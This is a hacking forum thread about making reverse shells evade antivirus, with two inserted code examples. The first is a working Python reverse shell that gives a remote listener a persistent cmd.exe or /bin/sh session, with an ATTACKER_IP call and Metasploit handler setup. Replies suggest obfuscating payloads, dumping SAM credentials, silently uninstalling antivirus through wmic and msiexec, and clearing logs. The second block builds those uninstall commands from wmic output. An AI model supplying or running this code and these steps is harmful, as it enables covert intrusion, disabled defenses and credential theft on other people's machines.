Posted

Hi.. First post. Hope I don't break any rules..

I was playing around with Metasploit, and I wanted to get my hands on a way to avoid AV.

So I tried crypters and they may be good but not great. I saw a video "DerbyCon 3 0 3202 Antivirus Evasion Lessons Learned Thelightcosine". I didn't just skip to the end to get my answer, which is how I can get my payloads FUD, because I enjoyed the video.

Well.. So I understood it was either paying $5000 a year for Metasploit Pro and getting my hands on Dynamic Payloads :wub:, or learning to code and making my own reverse TCP script that will be FUD :ph34r:.

But I don't have the money or the skillz :mellow:.

So I gave it up.

No, I'm joking.. I found a Python script online.

It's a server script that does the listening on the port, and a client script that makes the reverse TCP connection.

It's working and all, but there is no point in just having a connection to the Windows command line.

Metasploit has all those goodies that I can use...

But the problem is that when I run it (the client script), I can't have it connect back to Metasploit, only to the Python "server" script.

BTW I can have it connect to netcat, but the connection also breaks when I run a command like "cd c:\".

I looked at the code and tried figuring out why, but the only reason I can think of is that netcat and Metasploit are supposed to be used with their own scripts.

But I hope there is a way.. is there??? :unsure:
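Added example (not the script from the post above): a reverse TCP client that speaks the raw byte stream netcat and Metasploit's `exploit/multi/handler` with `generic/shell_reverse_tcp` expect, with no framing of its own, and that keeps a single shell process alive for the whole session so state set by `cd` persists between commands. The listener address (`127.0.0.1`, an OS-chosen port), the `self_test` function standing in for netcat, and the POSIX commands in the self-test are assumptions made so the block runs offline; against a real listener you would call `reverse_shell("ATTACKER_IP", 4444)`.

```python
import os
import socket
import subprocess
import threading

# Shell to expose: cmd.exe on Windows, /bin/sh elsewhere so the self-test runs on Linux too.
SHELL = ["cmd.exe"] if os.name == "nt" else ["/bin/sh"]


def reverse_shell(host, port, shell=SHELL):
    """Connect back to host:port and bridge the socket to ONE long-lived shell.

    No command protocol: every byte the listener sends goes to the shell's stdin,
    and everything the shell prints (stdout and stderr) goes back unchanged.
    That raw stream is what `nc -lvp PORT` and Metasploit's multi/handler with
    payload generic/shell_reverse_tcp expect. Because the shell process lives for
    the whole session, `cd` and other state survive from one command to the next.
    """
    sock = socket.create_connection((host, port))
    proc = subprocess.Popen(
        shell,
        stdin=subprocess.PIPE,
        stdout=subprocess.PIPE,
        stderr=subprocess.STDOUT,  # merge stderr so error text reaches the listener too
        bufsize=0,                 # unbuffered pipes: relay output as soon as it appears
    )

    def shell_to_socket():
        # Relay shell output until the shell exits (EOF on its stdout).
        while True:
            data = proc.stdout.read(4096)
            if not data:
                break
            try:
                sock.sendall(data)
            except OSError:
                break
        try:
            sock.shutdown(socket.SHUT_WR)  # tell the listener we are done
        except OSError:
            pass

    pump = threading.Thread(target=shell_to_socket, daemon=True)
    pump.start()
    try:
        # Relay listener input until the listener closes its side.
        while True:
            data = sock.recv(4096)
            if not data:
                break
            while data:  # unbuffered write may be partial; keep writing
                written = proc.stdin.write(data)
                data = data[written:]
    finally:
        try:
            proc.stdin.close()  # EOF on stdin makes the shell exit cleanly
        except OSError:
            pass
        try:
            proc.wait(timeout=10)
        except subprocess.TimeoutExpired:
            proc.kill()
        pump.join(timeout=10)
        sock.close()
    return proc.returncode


def self_test(commands, timeout=15):
    """Stand-in for netcat on 127.0.0.1 (constructed for this example): accept one
    callback, send the commands, close our write side, return all output."""
    listener = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    listener.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    listener.bind(("127.0.0.1", 0))  # port 0: let the OS pick a free port
    listener.listen(1)
    port = listener.getsockname()[1]

    client = threading.Thread(target=reverse_shell, args=("127.0.0.1", port), daemon=True)
    client.start()

    conn, _ = listener.accept()
    conn.settimeout(timeout)
    for cmd in commands:
        conn.sendall(cmd.encode() + b"\n")  # exactly what typing into nc would send
    conn.shutdown(socket.SHUT_WR)
    chunks = []
    try:
        while True:
            data = conn.recv(4096)
            if not data:
                break
            chunks.append(data)
    except socket.timeout:
        pass
    conn.close()
    listener.close()
    client.join(timeout)
    return b"".join(chunks).decode(errors="replace")


if __name__ == "__main__":
    demo = ["cd \\", "cd", "echo done"] if os.name == "nt" else ["cd /", "pwd", "echo done"]
    print(self_test(demo))
```

The self-test shows the property the post is after: the second command runs in the directory the first one changed to, because both go to the same shell process. Against Metasploit, start `exploit/multi/handler` with `set PAYLOAD generic/shell_reverse_tcp` and the matching LHOST/LPORT before running the client.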

Posted (edited)

Maybe this will help?

Note, this isn't Metasploit, but if you're clever, you can do almost everything sploit can, or gather enough info to then use sploit.

Reverse shell with the above method > Gather vulnerability details > Metasploit

Edited by haze1434
Posted (edited)

there is no point in just having connection to windows command line

I just re-read your post. Perhaps that's where you already got the details from!

I disagree though. Why not use the method you've already had success with to get CMD, then gather information to find an exploit you can use in 'sploit?

For example, with CMD you can use...

wmic product list brief

... to get all of the software and version numbers of the target PC, then try and find an exploit in Metasploit for it.

Think of the CMD reverse shell as recon rather than the exploit itself. But you are perhaps underestimating CMD. Yes, whilst it's not as 'classy' as other tools, you can do a lot with CMD: amend the registry, move files, open ports, etc.

Edited by haze1434
Posted

If you want it not detected, it's a matter of using obfuscation with Python. I'm not 100% on how to obfuscate that, but doing an EXE would be something pretty simple; a friend made a video on how to do that with an EXE.

http://www.freecst.com/howto-hex-editing-bypass-antivirus/

Posted

Thanks for the help..

Yeah, I know I can use Windows CMD to gather info.. But if I already have the ability to drop an EXE file on the machine and have them run it, I'd rather it be a payload that will give me access to everything, including transferring files.

Thanks for the vid, I'll watch it..

I found C source code for a reverse TCP shell that works with Metasploit, but I don't understand C enough to change it to make it FUD.

Maybe using the hex editing like in the video.

  • 3 weeks later...
Posted (edited)
On 01/06/2016 at 2:44 PM, cooper said:

Does AV honour this request?

Good point. I believe maybe 60% of AV programs would honour the request if we sent the command as admin. The rest would probably block it, but it'd be worth a try in the first instance.

One could get the admin credentials using CMD by grabbing them from the SAM database (e.g. C:\WINDOWS\system32\config) and decrypting them. Again, this would depend on the password strength, but then a lot of hacks usually do.

If this didn't work, I'd also try uninstalling the AV program using admin CMD. Maybe something like:

product where name="[Name of AV program]" call uninstall

or we could perhaps use wmic to get the reference for the program and then msiexec...

wmic product list brief
MsiExec.exe /X{0000-00000-00000-00000-00000} /qb

Worth a try! Just don't forget to clear those logs :wink:

Edited by haze1434
Amended script.
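Added example, covering both the recon use of `wmic product list brief` suggested earlier in the thread and the product-code lookup this post feeds into `MsiExec.exe /X{...}`; it is not code from any poster. It parses wmic's fixed-width table by taking the column boundaries from the header line, matches products by name, and builds the two uninstall command lines quoted in the post. The product names, vendors and GUIDs in `SAMPLE` are constructed, not real output. Two caveats a practitioner should know: `wmic product` enumerates Win32_Product, which lists only software installed through Windows Installer and is slow because it triggers an MSI consistency check on each product (with corresponding MSI entries in the Application event log); and when wmic output is redirected to a file it is written as UTF-16, so decode it before parsing.

```python
import re


def parse_wmic_brief(text):
    """Parse the fixed-width table printed by `wmic product list brief`.

    wmic pads every row to the header, so the start offset of each header word is
    a column boundary and each column runs to the start of the next one.
    Returns dicts keyed by the lower-cased header names
    (caption, identifyingnumber, name, vendor, version).
    """
    lines = [ln.rstrip() for ln in text.splitlines() if ln.strip()]
    if not lines:
        return []
    header = lines[0]
    starts = [m.start() for m in re.finditer(r"\S+", header)]
    bounds = list(zip(starts, starts[1:] + [None]))
    keys = [header[s:e].strip().lower() for s, e in bounds]
    return [dict(zip(keys, [line[s:e].strip() for s, e in bounds])) for line in lines[1:]]


# MSI product codes are braced GUIDs; anything else means we sliced a column wrong.
GUID_RE = re.compile(r"^\{[0-9A-F]{8}(?:-[0-9A-F]{4}){3}-[0-9A-F]{12}\}$", re.IGNORECASE)


def find_products(products, name_fragment):
    """Recon step: case-insensitive substring match on the Name column."""
    frag = name_fragment.lower()
    return [p for p in products if frag in p["name"].lower()]


def resolve_one(products, name_fragment):
    """Require exactly one match so we never build a command for the wrong product."""
    matches = find_products(products, name_fragment)
    if len(matches) != 1:
        raise LookupError(f"{len(matches)} products match {name_fragment!r}; be more specific")
    return matches[0]


def msiexec_uninstall_command(products, name_fragment):
    """The post's second form: MsiExec.exe /X{ProductCode} /qb."""
    code = resolve_one(products, name_fragment)["identifyingnumber"]
    if not GUID_RE.match(code):
        raise ValueError(f"unexpected product code {code!r}")
    return f"MsiExec.exe /X{code} /qb"


def wmic_uninstall_command(products, name_fragment):
    """The post's first form, using the exact Name wmic reported."""
    name = resolve_one(products, name_fragment)["name"]
    if '"' in name:
        raise ValueError("product name contains a quote; wmic where-clause would break")
    return f'wmic product where name="{name}" call uninstall'


def _row(*cols):
    # Lay out a row the way wmic does: left-aligned, padded to fixed widths.
    widths = (32, 40, 32, 24)
    return "".join(c.ljust(w) for c, w in zip(cols, widths)) + cols[4]


# Constructed sample in wmic's layout (hypothetical products, not captured output).
SAMPLE = "\r\n".join([
    _row("Caption", "IdentifyingNumber", "Name", "Vendor", "Version"),
    _row("Example Viewer 9.1", "{11111111-2222-3333-4444-555555555555}",
         "Example Viewer 9.1", "Example Corp", "9.1.0"),
    _row("Contoso Antivirus", "{AAAAAAAA-BBBB-CCCC-DDDD-EEEEEEEEEEEE}",
         "Contoso Antivirus", "Contoso Ltd", "12.4.7"),
    _row("Contoso Antivirus Updater", "{AAAAAAAA-BBBB-CCCC-DDDD-FFFFFFFFFFFF}",
         "Contoso Antivirus Updater", "Contoso Ltd", "12.4.7"),
]) + "\r\n"


if __name__ == "__main__":
    inventory = parse_wmic_brief(SAMPLE)
    for p in inventory:
        print(f"{p['name']:<30} {p['version']:<10} {p['vendor']}")
    print(msiexec_uninstall_command(inventory, "Contoso Antivirus Updater"))
    print(wmic_uninstall_command(inventory, "Example Viewer"))
```

The strict single-match rule matters: a fragment like "Contoso Antivirus" hits both the product and its updater in the sample, and the function refuses rather than picking one. Feed real output through `parse_wmic_brief` only after decoding it (`open(path, encoding="utf-16")` for a redirected file).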